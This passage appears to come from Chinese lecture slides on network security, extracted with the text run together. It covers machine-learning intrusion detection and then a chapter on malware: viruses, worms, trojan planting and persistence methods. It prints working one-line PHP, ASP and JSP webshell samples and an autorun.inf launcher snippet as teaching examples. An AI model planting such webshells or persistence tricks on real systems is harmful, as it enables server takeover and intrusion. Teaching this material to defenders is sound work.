g)化學(xué)習(xí)(ReinforcementLearning,RL)：根據(jù)反饋信息來調(diào)整機(jī)器行為以實(shí)現(xiàn)自動決策弱監(jiān)督學(xué)習(xí)機(jī)器學(xué)習(xí)機(jī)器學(xué)習(xí)算法地圖機(jī)器學(xué)習(xí)生成對抗網(wǎng)絡(luò)(

GenerativeAdversarialNetworks,GANs)對抗機(jī)器學(xué)習(xí)(AdversarialMachineLearning,AML)GAN與AML機(jī)器學(xué)習(xí)生成對抗網(wǎng)絡(luò)（GenerativeAdversarialNetwork，GAN）：機(jī)器學(xué)習(xí)對抗機(jī)器學(xué)習(xí)（AdversarialMachineLearning）：機(jī)器學(xué)習(xí)基本問題基本問題：特征提取規(guī)則構(gòu)建模型評估機(jī)器學(xué)習(xí)基本問題特征提取：機(jī)器學(xué)習(xí)基本問題規(guī)則構(gòu)建：機(jī)器學(xué)習(xí)基本問題模型評估：機(jī)器學(xué)習(xí)任務(wù)回歸(Regression)分類(Classification)聚類(Clustering)降維(DimensionalityReduction)機(jī)器學(xué)習(xí)任務(wù)機(jī)器學(xué)習(xí)任務(wù)回歸(Regression)分類(Class)與單分類(OneClass)聚類(Clustering)降維(DimensionalityReduction)機(jī)器學(xué)習(xí)任務(wù)回歸機(jī)器學(xué)習(xí)任務(wù)分類機(jī)器學(xué)習(xí)任務(wù)單分類（OneClass）機(jī)器學(xué)習(xí)任務(wù)聚類機(jī)器學(xué)習(xí)任務(wù)降維機(jī)器學(xué)習(xí)任務(wù)機(jī)器學(xué)習(xí)任務(wù)機(jī)器學(xué)習(xí)與網(wǎng)絡(luò)安全三、入侵檢測研究方向研究領(lǐng)域高速網(wǎng)絡(luò)中的數(shù)據(jù)獲取及處理問題光分流器，并行、分布式處理：有什么問題？尋找更好的數(shù)據(jù)來描述用戶、程序行為的模式如何評價(jià)數(shù)據(jù)源？（信息率中的熵）降低誤報(bào)率和漏報(bào)率：最難！

事件關(guān)聯(lián)、機(jī)器學(xué)習(xí)、大數(shù)據(jù)分析綜合集成：與其它安全產(chǎn)品聯(lián)動，UIM，安全態(tài)勢感知APT攻擊檢測APT檢測檢測難點(diǎn)：

攻擊行為特征提取難（滯后性）：0day漏洞，未知特征木馬攻擊單點(diǎn)隱蔽性強(qiáng)：動態(tài)行為和靜態(tài)文件的隱蔽性攻擊渠道多樣化：多種攻擊方法攻擊空間不確定：任何一個網(wǎng)絡(luò)暴露點(diǎn)都有可能是攻擊目標(biāo)，攻防雙方信息不對稱APT檢測檢測難點(diǎn)：攻擊持續(xù)和隱蔽時(shí)間長：傳統(tǒng)的檢測方式是基于單個時(shí)間點(diǎn)的實(shí)時(shí)檢測，難以對跨度如此長的攻擊進(jìn)行有效跟蹤。慢速、分階段實(shí)施的APT攻擊淹沒在大數(shù)據(jù)中。大數(shù)據(jù)的價(jià)值低密度性，使得安全分析工具很難聚焦在價(jià)值點(diǎn)上?；诖髷?shù)據(jù)分析的APT檢測由于網(wǎng)絡(luò)中的安全數(shù)據(jù)具有體量巨大、來源多樣、增漲速度快和價(jià)值密度低等大數(shù)據(jù)特征，興起了基于網(wǎng)絡(luò)大數(shù)據(jù)的安全檢測：實(shí)現(xiàn)海量網(wǎng)絡(luò)安全數(shù)據(jù)的深度關(guān)聯(lián)分析，并對寬時(shí)間窗口內(nèi)的多類型安全事件進(jìn)行智能關(guān)聯(lián)，在檢測APT方面有優(yōu)勢研究領(lǐng)域機(jī)器學(xué)習(xí)用于異常檢測解決未知威脅的檢測問題Darktrace公司的免疫防御：基于網(wǎng)絡(luò)流量SecBI公司的入侵防御：基于日志DarktraceDarktrace使用獨(dú)特的無監(jiān)督機(jī)器學(xué)習(xí)算法對網(wǎng)絡(luò)數(shù)據(jù)進(jìn)行大規(guī)模分析，并基于所看到的證據(jù)進(jìn)行數(shù)十億次基于概率的計(jì)算。它不依賴于過去威脅的知識，而是獨(dú)立地對數(shù)據(jù)進(jìn)行分類，并檢測突出的模式。由此，它形成了對網(wǎng)絡(luò)中“正?！毙袨榈睦斫?，這些行為與設(shè)備、用戶或任一實(shí)體的組有關(guān)，并檢測出與這種不斷演變的“生活模式”的偏離，這種偏離可能指向一個正在發(fā)展的威脅。DarktraceDarktarceDarktraceDarktrace使用貝葉斯概率作為其無監(jiān)督機(jī)器學(xué)習(xí)方法的一部分發(fā)現(xiàn)以前未知的關(guān)系獨(dú)立的數(shù)據(jù)進(jìn)行分類檢測引人注目的模式，這些模式定義了可能被認(rèn)為是正常的行為如果需要，在沒有預(yù)先假設(shè)的情況下工作Darktrace在貝葉斯框架中采用多種無監(jiān)督、有監(jiān)督和深度學(xué)習(xí)技術(shù)，企業(yè)免疫系統(tǒng)可以整合大量異常行為的弱指標(biāo)，從而產(chǎn)生一個單一的明確的威脅概率度量DarktraceDarktrace通過對設(shè)備網(wǎng)絡(luò)行為的大量不同度量的分析，從數(shù)學(xué)上描述了構(gòu)成“正?！毙袨榈囊蛩兀ǎ悍?wù)器訪問、數(shù)據(jù)量、計(jì)時(shí)的事件、證書使用、連接類型、容量和方向、上傳/下載的方向性、文件類型、管理活動、資源和信息請求Darktrace用聚類方法對設(shè)備進(jìn)行分組（ClusteringDevices），進(jìn)而對設(shè)備正常行為建模Darktrace網(wǎng)絡(luò)拓?fù)浞治霭l(fā)現(xiàn)細(xì)小的拓?fù)洚惓Ｗ兓疍arktrace動態(tài)演化網(wǎng)絡(luò)行為建模Darktrace使用遞歸貝葉斯估計(jì)（RecursiveBayesianEstimation）動態(tài)生成組成網(wǎng)絡(luò)的設(shè)備狀態(tài)的單一完整視圖Darktrace利用深度學(xué)習(xí)（DeepLearning）增強(qiáng)建模過程DarktraceDarktrace專利信息DarktraceDarktrace專利信息Darktrace小結(jié)：利用機(jī)器學(xué)習(xí)進(jìn)行網(wǎng)絡(luò)行為分析DarktraceSecBIDarktrace基于網(wǎng)絡(luò)流量，而SecBI則是基于日志SecBISecBISecBI第十四章惡意代碼內(nèi)容提綱2木馬的工作原理3木馬隱藏技術(shù)4惡意代碼概述1惡意代碼檢測與防御一、定義惡意代碼(maliciouscode)：執(zhí)行惡意功能的計(jì)算機(jī)代碼不同廠商（或?qū)W術(shù)機(jī)構(gòu)）在惡意代碼的分類（一般都包括病毒、蠕蟲和木馬，其它的則有所不同）和定義上有所不同不同時(shí)間段內(nèi)，惡意代碼的分類和定義也會有變化惡意代碼美國科恩博士（最早定義）：計(jì)算機(jī)病毒是一種計(jì)算機(jī)程序，它通過修改其他程序把自己的一個拷貝或演化的拷貝插入到其他程序中實(shí)施感染傳染特性，即病毒可以自我繁殖演化特性，即病毒在感染過程中可以改變自身的一些特征，以逃避查殺計(jì)算機(jī)病毒賽門鐵克PeterSzor給出定義：計(jì)算機(jī)病毒是一種計(jì)算機(jī)程序，它遞歸地、明確地復(fù)制自己或其演化體。“明確遞歸”來區(qū)別病毒與正常程序的復(fù)制過程，“遞歸”反映了一個文件在被病毒感染以后會進(jìn)一步感染其他文件，“明確”強(qiáng)調(diào)了自我復(fù)制是病毒的主要功能。計(jì)算機(jī)病毒《中華人民共和國計(jì)算機(jī)信息系統(tǒng)安全保護(hù)條例》(1994.2.18)的第二十八條：“計(jì)算機(jī)病毒，是指編制或者在計(jì)算機(jī)程序中插入的破壞計(jì)算機(jī)功能或者毀壞數(shù)據(jù)，影響計(jì)算機(jī)使用，并能自我復(fù)制的一組計(jì)算機(jī)指令或者程序代碼”。計(jì)算機(jī)病毒幾個典型特性傳染性潛伏性可觸發(fā)性寄生性非授權(quán)執(zhí)行性破壞性計(jì)算機(jī)病毒典型計(jì)算機(jī)病毒基于功能模塊引導(dǎo)模塊搜索模塊感染模塊表現(xiàn)模塊標(biāo)識模塊計(jì)算機(jī)病毒計(jì)算機(jī)蠕蟲（Worm）：一種可以獨(dú)立運(yùn)行，并通過網(wǎng)絡(luò)傳播的惡性代碼。具有計(jì)算機(jī)病毒的一些特性，如傳播性、隱蔽性、破壞性等，但蠕蟲也具有自己的特點(diǎn)，如漏洞依賴性等，需要通過網(wǎng)絡(luò)系統(tǒng)漏洞進(jìn)行傳播，另外蠕蟲也不需要宿主文件，有的蠕蟲甚至只存在于內(nèi)存中計(jì)算機(jī)蠕蟲典型計(jì)算機(jī)蠕蟲基于功能模塊搜索模塊攻擊模塊傳輸模塊負(fù)載模塊控制模塊計(jì)算機(jī)蠕蟲計(jì)算機(jī)木馬RFC1244(RequestforComments:1244)中是這樣描述木馬的:

“木馬是一種程序，它能提供一些有用的，或是僅僅令人感興趣的功能，但是它還有用戶所不知道的其他功能，例如在你不了解的情況下拷貝文件或竊取你的密碼。”

計(jì)算機(jī)木馬RFC1244的定義可以澄清一些模糊概念：首先木馬程序并不一定實(shí)現(xiàn)某種對用戶來說有意義或有幫助的功能，但卻會實(shí)現(xiàn)一些隱藏的、危險(xiǎn)的功能；其次木馬所實(shí)現(xiàn)的主要功能并不為受害者所知，只有程序編制者最清楚。第三，這個定義暗示“有效負(fù)載”是惡意的。計(jì)算機(jī)木馬目前，大多數(shù)安全專家統(tǒng)一認(rèn)可的定義是：木馬是一段能實(shí)現(xiàn)有用的或必需的功能的程序，但是同時(shí)還完成一些不為人知的功能。計(jì)算機(jī)木馬木馬程序具有很大的危害性，主要表現(xiàn)在:自動搜索已中木馬的計(jì)算機(jī)；管理對方資源，如復(fù)制文件、刪除文件、查看文件內(nèi)容、上傳文件、下載文件等；跟蹤監(jiān)視對方屏幕；直接控制對方的鍵盤、鼠標(biāo)；隨意修改注冊表和系統(tǒng)文件；共享被控計(jì)算機(jī)的硬盤資源；監(jiān)視對方任務(wù)且可終止對方任務(wù)；遠(yuǎn)程重啟和關(guān)閉機(jī)器。計(jì)算機(jī)木馬從木馬所實(shí)現(xiàn)的功能角度可分為：破壞型密碼發(fā)送型遠(yuǎn)程訪問型鍵盤記錄木馬DoS攻擊木馬代理木馬反彈端口型木馬從木馬形態(tài)上分，可以分為有文件木馬和無文件木馬有文件木馬：木馬本身是一個可執(zhí)行文件無文件木馬：木馬不是一個可執(zhí)行文件，需要依靠其它軟件來觸發(fā)執(zhí)行計(jì)算機(jī)木馬無文件木馬：木馬不是一個獨(dú)立可執(zhí)行的文件，而是通過特定方式隱藏在其它文件中，通過其它軟件來觸發(fā)執(zhí)行。例如：Office文檔中的宏；一段可解釋執(zhí)行的語言代碼，如Java、Python代碼段；Shell腳本；配置文件中一段腳本；注冊表中的一個鍵值等。通常功能比較簡單，只是攻擊的第一步，執(zhí)行后再下載更多的攻擊代碼到目標(biāo)機(jī)器中計(jì)算機(jī)木馬計(jì)算機(jī)木馬一句話木馬是指只有一行代碼的木馬，利用Web編程語言（asp、php、jsp、aspx）的某個函數(shù)來執(zhí)行攻擊命令，也稱為webshell。PHP一句話木馬示例：<?phpeval($_POST[sb])?><?phpassert($_POST[sb]);?><?$_POST['sa']($_POST['sb'],$_POST['sc'])?><?php@eval($_POST['cmd']);?>計(jì)算機(jī)木馬木馬ASP一句話木馬示例：<%evalrequest("sb")%><%executerequest("sb")%><%'<%loop<%:%><%executerequest("sb")%><%ExecuteGlobalrequest("sb")%>JSP一句話木馬示例：<%

if(request.getParameter("f")!=null)(newjava.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());

%>微軟表示，在2020年8月至2021年1月期間，每月檢測到大約14萬個網(wǎng)絡(luò)惡意shell，相比去年報(bào)告的7.7萬個，幾乎翻了一倍其它：一句話木馬討論：一句話木馬是不是無文件木馬？計(jì)算機(jī)木馬病毒、蠕蟲、木馬的區(qū)別惡意代碼二、惡意代碼概念的演變2000年以前：病毒時(shí)代背景：DOS退場，Windows9x/NT廣泛應(yīng)用，促進(jìn)了網(wǎng)絡(luò)應(yīng)用進(jìn)入日常生活中在DOS時(shí)代，感染式病毒（Virus）、蠕蟲（Worm）和特洛伊木馬（Trojan），都是相對窄而互斥的技術(shù)概念：Virus是主流惡意代碼概念的發(fā)展史2000~2005：蠕蟲大爆發(fā)時(shí)代Happy99蠕蟲利用劫持電子郵件的方式傳播并快速流行，拉開了蠕蟲時(shí)代大幕2011年：紅色代碼（CodeRed）及其變種“紅色代碼II”（CodeRedII）大爆發(fā)：掃描溢出型蠕蟲的典型代表惡意代碼概念的發(fā)展史2005~2010：木馬泛濫時(shí)代隨著端系統(tǒng)的安全性的提高（DEP、ALSR等技術(shù)的應(yīng)用），蠕蟲的影響開始減弱2005年，以灰鴿子、冰河為代表的遠(yuǎn)程控制程序在技術(shù)上趨于成熟，感染數(shù)量持續(xù)增加2007~2009：地下經(jīng)濟(jì)運(yùn)作日趨“成熟”，基于木馬的黑色產(chǎn)業(yè)鏈2007年上半年：毒王“AV終結(jié)者”惡意代碼概念的發(fā)展史2010~2020：虛擬貨幣和隱秘網(wǎng)絡(luò)帶動的勒索新對抗2013年開始，勒索軟件、挖礦木馬逐步泛濫2016：Mirai爆發(fā)，致癱Dyn2017：WannaCry全球大爆發(fā)2019：WannaMine挖礦木馬爆發(fā)惡意代碼概念的發(fā)展史傳統(tǒng)意義上的病毒越來越少，當(dāng)前主流惡意代碼形式是木馬（占絕大多數(shù)）和蠕蟲不同惡意代碼形式的界限越來越模糊，采用的技術(shù)有融合的趨勢惡意代碼360惡意代碼惡意代碼種類

2007年下半年新增病毒的比例（瑞星）惡意代碼種類

2018年CNCERT中國互聯(lián)網(wǎng)網(wǎng)絡(luò)安全報(bào)告惡意代碼種類

2019年CNCERT中國互聯(lián)網(wǎng)網(wǎng)絡(luò)安全報(bào)告惡意代碼種類

2019年CNCERT中國互聯(lián)網(wǎng)網(wǎng)絡(luò)安全報(bào)告內(nèi)容提綱2木馬的工作原理3木馬的隱藏技術(shù)4惡意代碼概述1惡意代碼檢測與防御遠(yuǎn)程控制木馬木馬體系結(jié)構(gòu)：C/S架構(gòu)，木馬程序+控制端程序木馬程序即是服務(wù)器端程序?？刂贫顺绦蜃鳛榭蛻舳耍糜诠粽哌h(yuǎn)程控制被植入木馬的機(jī)器。遠(yuǎn)程控制木馬與遠(yuǎn)程控制軟件的區(qū)別?隱蔽性:木馬被隱藏，避免被發(fā)現(xiàn)；非授權(quán)性：木馬程序不經(jīng)授權(quán)控制主機(jī)遠(yuǎn)程控制木馬的運(yùn)行步驟遠(yuǎn)程控制木馬進(jìn)行網(wǎng)絡(luò)入侵的過程:配置木馬傳播木馬啟動木馬建立連接遠(yuǎn)程控制配置木馬：通信配置：監(jiān)聽端口、DNS、IP等功能配置：文件讀取、鍵盤監(jiān)聽、截屏等安裝配置：安裝路徑、文件名、是否刪除安裝文件、注冊表啟動項(xiàng)等配置木馬案例：冰河木馬的配置界面配置木馬遠(yuǎn)程控制木馬的運(yùn)行步驟遠(yuǎn)程控制木馬進(jìn)行網(wǎng)絡(luò)入侵的過程:配置木馬傳播木馬啟動木馬建立連接遠(yuǎn)程控制傳播木馬：木馬植入木馬植入技術(shù)可以大概分為主動植入與被動植入兩類。主動植入：攻擊者主動將木馬程序種到本地或者是遠(yuǎn)程主機(jī)上，這個行為過程完全由攻擊者主動掌握。被動植入：攻擊者預(yù)先設(shè)置某種環(huán)境，然后被動等待目標(biāo)系統(tǒng)用戶的某種可能的操作，只有這種操作執(zhí)行，木馬程序才有可能植入目標(biāo)系統(tǒng)。1、主動植入主動植入一般需要通過某種方法獲取目標(biāo)主機(jī)的一定權(quán)限，然后由攻擊者自己動手進(jìn)行安裝。按照目標(biāo)系統(tǒng)是本地還是遠(yuǎn)程的區(qū)分，這種方法又有本地安裝與遠(yuǎn)程安裝之分。1、主動植入由于在一個系統(tǒng)植入木馬，不僅需要將木馬程序上傳到目標(biāo)系統(tǒng)，還需要在目標(biāo)系統(tǒng)運(yùn)行木馬程序，所以主動植入需要具有目標(biāo)系統(tǒng)的寫權(quán)限和可執(zhí)行權(quán)限。如果僅僅具有寫權(quán)限，只能將木馬程序上傳但不能執(zhí)行，這種情況屬于被動植入，因?yàn)槟抉R仍然需要被動等待以某種方式被執(zhí)行。（1）本地安裝本地安裝就是直接在本地主機(jī)上進(jìn)行安裝。一個人很難確保除了自己之外自己的計(jì)算機(jī)不會被其他人使用。而在經(jīng)常更換使用者的公共場所（如網(wǎng)吧、飯店、賓館、咖啡店等）的計(jì)算機(jī)上，這種安裝木馬的方法更是非常普遍、有效。（2）遠(yuǎn)程安裝遠(yuǎn)程安裝就是通過常規(guī)攻擊手段獲得目標(biāo)主機(jī)的一定權(quán)限后，將木馬上傳到目標(biāo)主機(jī)上，并使其運(yùn)行起來。例如，某些系統(tǒng)漏洞的存在，使得攻擊者可以利用漏洞遠(yuǎn)程將木馬程序上傳并執(zhí)行。從實(shí)現(xiàn)方式上，主要分為：利用系統(tǒng)自身漏洞植入利用第三方軟件漏洞植入（3）利用系統(tǒng)自身漏洞植入這是一種主動攻擊的方式。攻擊者利用所了解的系統(tǒng)的安全漏洞及其特性主動出擊。如IIS服務(wù)器的溢出漏洞，通過一個“IISHack”的攻擊程序就可使IIS服務(wù)器崩潰，并同時(shí)在被攻擊服務(wù)器執(zhí)行“木馬”程序。MIME漏洞則是利用InternetExplorer在處理不正常的MIME類型存在的問題，攻擊者有意地更改MIME類型，使IE可以不提示用戶而直接運(yùn)行電子郵件附件中的惡意程序等。（4）利用第三方軟件漏洞植入每臺主機(jī)上都會安裝一些第三方軟件或者提供服務(wù)，但是這些軟件可能存在可被利用的漏洞，如果被惡意者利用，你的主機(jī)就可以成為木馬的“棲息地”。例如：AT-TFTPServer在處理帶有超長文件名參數(shù)的請求時(shí)存在漏洞，遠(yuǎn)程攻擊者可能利用此漏洞在服務(wù)器上執(zhí)行任意指令。2、被動植入被動植入主要是利用以下方式將木馬程序植入目標(biāo)系統(tǒng)：網(wǎng)頁瀏覽植入利用電子郵件植入利用網(wǎng)絡(luò)下載植入利用即時(shí)通工具植入與其它程序捆綁利用移動存儲設(shè)備植入（1）網(wǎng)頁瀏覽植入網(wǎng)頁瀏覽傳播：利用Script/ActiveX控件/JavaApplet等編寫出一個HTML網(wǎng)頁，當(dāng)我們?yōu)g覽該頁面時(shí)，會在后臺將木馬程序下載到計(jì)算機(jī)緩存中，然后修改系統(tǒng)注冊表，使相關(guān)鍵值指向“木馬”程序。還可以利用瀏覽器的已知或者未知的漏洞，把木馬下載到本機(jī)并運(yùn)行。水坑攻擊（Wateringhole）：在受害者必經(jīng)之路設(shè)置一個“水坑(陷阱)”。最常見的做法是，黑客分析攻擊目標(biāo)的上網(wǎng)活動規(guī)律，尋找攻擊目標(biāo)經(jīng)常訪問的網(wǎng)站的弱點(diǎn)，先將此網(wǎng)站“攻破”并植入攻擊代碼，一旦攻擊目標(biāo)訪問該網(wǎng)站就會“中招”（2）水坑攻擊2020.2.19：黑客利用后門對香港iOS用戶發(fā)起水坑攻擊（2）水坑攻擊威瑞森的報(bào)告顯示，94%的惡意軟件通過電子郵件傳播，排名第一的社會工程攻擊是網(wǎng)絡(luò)釣魚（3）利用電子郵件植入（3）利用電子郵件植入電子郵件（E-mail）進(jìn)行傳播：攻擊者將“木馬”程序偽裝成E-mail附件的形式發(fā)送出去，收信人只要查看郵件附件就會使“木馬”程序得到運(yùn)行并安裝進(jìn)入系統(tǒng)。通過在郵件內(nèi)容內(nèi)嵌WSH(WindowsScriptsHost)腳本，用戶不需要打開附件，僅僅瀏覽一下郵件的內(nèi)容，附件中的木馬就會被執(zhí)行。附件文檔中不包含惡意代碼，而是下載惡意代碼的鏈接例一例二惡意Office文件樣本不利用漏洞，也未包含可疑的宏或VBA等操作，而是單純的利用XML連接外部開啟另一個惡意文件例三利用電子郵件植入（4）網(wǎng)絡(luò)下載植入一些非正規(guī)的網(wǎng)站以提供軟件下載為名，將木馬程序偽裝成用戶所希望的其它軟件，當(dāng)用戶下載安裝時(shí)，實(shí)際上所安裝的是木馬程序。（5）利用即時(shí)通工具植入即時(shí)通工具有文件傳輸功能，所以現(xiàn)在也有很多木馬通過它傳播。攻擊者通常把木馬服務(wù)器程序通過合并軟件和其他的可執(zhí)行文件綁在一起，然后騙你說是一個好玩的東東或者是漂亮MM的照片，你接受后運(yùn)行的話，你就成了木馬的犧牲品了。（6）與其它程序或文檔捆綁將木馬與其它軟件捆綁，用戶在下載安裝其它軟件時(shí)就不自覺地也安裝了木馬，這種情況下用戶很難察覺。攻擊者還可以在.doc、.ppt、.rar、.zip、.mpg、.pdf等文件中插入惡意代碼，當(dāng)用戶打開這些文檔時(shí)，就會被植入木馬。例：圖片木馬有一種圖片木馬，利用用戶認(rèn)為圖片文件不可執(zhí)行，因此不可能是木馬這樣的心理來欺騙受害者。實(shí)際上這是一個后綴名的小把戲。由于Windows系統(tǒng)默認(rèn)不顯示已經(jīng)注冊了的文件類型的后綴名，因此test.jpg.exe這種文件在系統(tǒng)上就顯示為test.jpg，木馬再采用和圖片文件一樣的圖標(biāo)，對大多數(shù)用戶而言，是極具欺騙性的。（7）利用移動存儲設(shè)備植入利用移動存儲設(shè)備傳播：利用Windows的Autoplay(autorun.inf)機(jī)制，當(dāng)插入U(xiǎn)盤、移動硬盤或者光盤時(shí)，可以自動執(zhí)行惡意程序。[AutoRun]open=scvhost.exeshellexecute=scvhost.exeshell\Auto\command=scvhost.exe“擺渡”木馬①植入外網(wǎng)主機(jī)“擺渡”木馬①植入外網(wǎng)主機(jī)②植入移動設(shè)備“擺渡”木馬①植入外網(wǎng)主機(jī)②植入移動設(shè)備③植入內(nèi)網(wǎng)主機(jī)“擺渡”木馬①植入外網(wǎng)主機(jī)②植入移動設(shè)備③植入內(nèi)網(wǎng)主機(jī)④敏感信息收集“擺渡”木馬①植入外網(wǎng)主機(jī)②植入移動設(shè)備③植入內(nèi)網(wǎng)主機(jī)④敏感信息收集⑤敏感信息轉(zhuǎn)移“擺渡”木馬①植入外網(wǎng)主機(jī)②植入移動設(shè)備③植入內(nèi)網(wǎng)主機(jī)④敏感信息收集⑤敏感信息轉(zhuǎn)移⑥敏感信息泄露2015.12.2夜間：安天監(jiān)控預(yù)警體系感知到如下線索：某知名作家在新浪微博發(fā)布消息，曝光有人以發(fā)送“采訪提綱”為借口，利用微博私信功能，發(fā)送惡意代碼鏈接。（8）社會工程學(xué)2015.12.2夜間：安天監(jiān)控預(yù)警體系感知到如下線索：某知名作家在新浪微博發(fā)布消息，曝光有人以發(fā)送“采訪提綱”為借口，利用微博私信功能，發(fā)送惡意代碼鏈接。（8）社會工程學(xué)（8）社會工程學(xué)無論是原始微博截圖中的頭像、微博兩條搜索結(jié)果顯示的圖像，還是百度網(wǎng)盤的頭像，相似度都非常高，讓人真假難辨。（8）社會工程學(xué)幸運(yùn)的是，沒有微博名人中招?。?）社會工程學(xué)社會工程學(xué)（8）社會工程學(xué)通過云應(yīng)用投放惡意代碼遠(yuǎn)程控制木馬的運(yùn)行步驟遠(yuǎn)程控制木馬進(jìn)行網(wǎng)絡(luò)入侵的過程:配置木馬傳播木馬啟動木馬建立連接遠(yuǎn)程控制自動加載技術(shù)木馬程序在被植入目標(biāo)主機(jī)后，不可能寄希望于用戶雙擊其圖標(biāo)來運(yùn)行啟動，只能不動聲色地自動啟動和運(yùn)行，攻擊才能以此為依據(jù)侵入被侵主機(jī)，完成控制。自動加載技術(shù)在Windows系統(tǒng)中木馬程序的自動加載技術(shù)主要有：修改系統(tǒng)文件修改系統(tǒng)注冊表添加系統(tǒng)服務(wù)修改文件打開關(guān)聯(lián)屬性修改任務(wù)計(jì)劃修改組策略利用系統(tǒng)自動運(yùn)行的程序修改啟動文件夾替換系統(tǒng)DLL(1)修改系統(tǒng)文件木馬程序一般會在第一次運(yùn)行時(shí)，修改目標(biāo)系統(tǒng)文件以達(dá)到自動加載的目的在早于WindwosXP版本的系統(tǒng)上，System.ini、Win.ini、Winstart.bat、Autoexec.bat等都是木馬所關(guān)注的配置文件。這些文件能自動被Windows在啟動時(shí)加載運(yùn)行，木馬將自身程序加入此類批處理文件，能夠達(dá)成開機(jī)啟動的目標(biāo)。這些文件雖然在后續(xù)版本的Windows系統(tǒng)上依然存在，但主要出于兼容早期系統(tǒng)的需要，很難再被木馬繼續(xù)利用(2)修改系統(tǒng)注冊表系統(tǒng)注冊表保存著系統(tǒng)的軟件、硬件及其它與系統(tǒng)配置有關(guān)的重要信息。在WinNT系列操作系統(tǒng)上，Windows主要使用注冊表存儲包括開機(jī)啟動項(xiàng)目的系統(tǒng)配置，修改注冊表隱蔽性相對較高，木馬常常采用這種方法實(shí)現(xiàn)開機(jī)自啟動。通常被攻擊者用作開機(jī)啟動的主鍵（在不同版本的系統(tǒng)中可能存在不同的主鍵）包括：(2)修改系統(tǒng)注冊表系統(tǒng)注冊表保存著系統(tǒng)的軟件、硬件及其它與系統(tǒng)配置有關(guān)的重要信息。HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run、Runonce、RunonceEx（在Win2000、WinXp中有效）、RunServices、RunServicesOnce等HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run、Runonce、RunonceEx、RunServices、RunServicesOnce等HKEY_USERS\[UserSID]\Software\Microsoft\Windows\CurrentVersion\Run、Runonce、RunonceEx、RunServices、RunServicesOnce等在上述主鍵中，HKEY_LOCAL_MACHINE對當(dāng)前系統(tǒng)的所有用戶有效，HKEY_CURRENT_USER僅對當(dāng)前登陸的用戶有效(2)修改系統(tǒng)注冊表系統(tǒng)注冊表保存著系統(tǒng)的軟件、硬件及其它與系統(tǒng)配置有關(guān)的重要信息。HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run、Runonce、RunonceEx（在Win2000、WinXp中有效）、RunServices、RunServicesOnce等HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run、Runonce、RunonceEx、RunServices、RunServicesOnce等HKEY_USERS\[UserSID]\Software\Microsoft\Windows\CurrentVersion\Run、Runonce、RunonceEx、RunServices、RunServicesOnce等在上述主鍵中，Runonce主鍵設(shè)置的自啟動程序?qū)⒃谙乱淮蜗到y(tǒng)啟動時(shí)獲得自動運(yùn)行的機(jī)會，并在運(yùn)行后從該主鍵移除。木馬程序如果利用這個主鍵進(jìn)行自啟動，則木馬的運(yùn)行通常有一個固定的操作，即需要在運(yùn)行后重新將自身加入到Runonce主鍵中，確保自己在每次系統(tǒng)啟動時(shí)均獲得運(yùn)行機(jī)會(3)添加系統(tǒng)服務(wù)WindowsNT內(nèi)核操作系統(tǒng)都大量使用服務(wù)來實(shí)現(xiàn)關(guān)鍵的系統(tǒng)功能。一些木馬將自身注冊為系統(tǒng)服務(wù)，并將相應(yīng)服務(wù)設(shè)置為系統(tǒng)開機(jī)時(shí)自啟動。例如，WindowsResourceKit工具包（其中包含的工具可能會根據(jù)用戶使用的Windows版本而有所不同）中的程序instsrv.exe常常被木馬用來創(chuàng)建系統(tǒng)服務(wù)，服務(wù)的管理和配置可以通過程序sc.exe來實(shí)施。這樣每當(dāng)Windows系統(tǒng)啟動時(shí)，即使沒有用戶登錄，木馬也會自動開始工作。作為服務(wù)啟動的木馬往往隱蔽性更強(qiáng)，一般用戶很難從服務(wù)中找出木馬程序(4)修改文件打開關(guān)聯(lián)屬性通常對于一些常用的文件如.txt文件，只要雙擊文件圖標(biāo)就能打開這個文件。這是因?yàn)樵谙到y(tǒng)注冊表中，已經(jīng)把這類文件與某個程序關(guān)聯(lián)起來，只要用戶雙擊該類文件，系統(tǒng)就自動啟動相關(guān)聯(lián)的程序來打開文件。修改文件打開關(guān)聯(lián)屬性是木馬程序的常用手段。比如：正常情況下.txt文件的打開方式為notepad.exe文件，而木馬可能將這類文件的關(guān)聯(lián)程序修改為木馬程序，這樣只要打開此類文件，就能在無意中啟動木馬。案例：冰河木馬。例：冰河的自動加載方法

HKEY_CLASSES_ROOT根鍵中記錄的是Windows操作系統(tǒng)中所有數(shù)據(jù)文件的信息，主要記錄不同文件的文件名后綴和與之對應(yīng)的應(yīng)用程序。

“冰河”就是通過修改HKEY_CLASSES_ROOT\txtfile\shell\open\command下的鍵值，將“C:\WINDOWS\NOTEPAD.EXE%1”

改為“C:\WINDOWS\SYSTEM\SYSEXPLR.EXE%1”，這樣一旦你雙擊一個TXT文件，原本應(yīng)用Notepad打開該文件的，現(xiàn)在卻變成啟動木馬程序了。

不同版本W(wǎng)indows系統(tǒng)的鍵名有差異！修改文件打開關(guān)聯(lián)不僅僅是TXT文件，其它諸如HTM、ZIP、RAR等都是木馬的目標(biāo)。對付這類木馬，只能經(jīng)常檢查HKEY_CLASSES_ROOT\文件類型\shell\open\command主鍵，查看其鍵值是否正常。(5)修改任務(wù)計(jì)劃在默認(rèn)情況下，任務(wù)計(jì)劃程序隨Windows一起啟動并在后臺運(yùn)行。如果把某個程序添加到計(jì)劃任務(wù)文件夾，并將計(jì)劃任務(wù)設(shè)置為“系統(tǒng)啟動時(shí)”或“登錄時(shí)”，這樣也可以實(shí)現(xiàn)程序自啟動。Windows10WindowsXP(6)修改組策略在“開始”→“運(yùn)行”中輸入“gpedit.msc"。按回車，打開系統(tǒng)組策略窗口，選擇“計(jì)算機(jī)配置”→“管理模板”→“系統(tǒng)”→“登錄”，雙擊右邊的“在用戶登錄時(shí)運(yùn)行這些程序”項(xiàng)。（6）修改組策略（續(xù)）打開其屬性對話框，選擇“已啟用”，再單擊“顯示”，會彈出“顯示內(nèi)容”對話框，列表中顯示的便是藏身于此的自啟動程序。如果你也想在這里添加自啟動項(xiàng)目，可單擊“添加”在出現(xiàn)的“添加項(xiàng)目”對話框中輸入可執(zhí)行文件的完整路徑和文件名，“確定”即可。(7)修改啟動文件夾當(dāng)前登陸用戶的“啟動”文件夾這是許多應(yīng)用軟件自啟動的常用位置。當(dāng)前登陸用戶的“啟動”文件夾一般在：C:\DocumentsandSettings\<用戶名字>\「開始」菜單\程序\啟動\對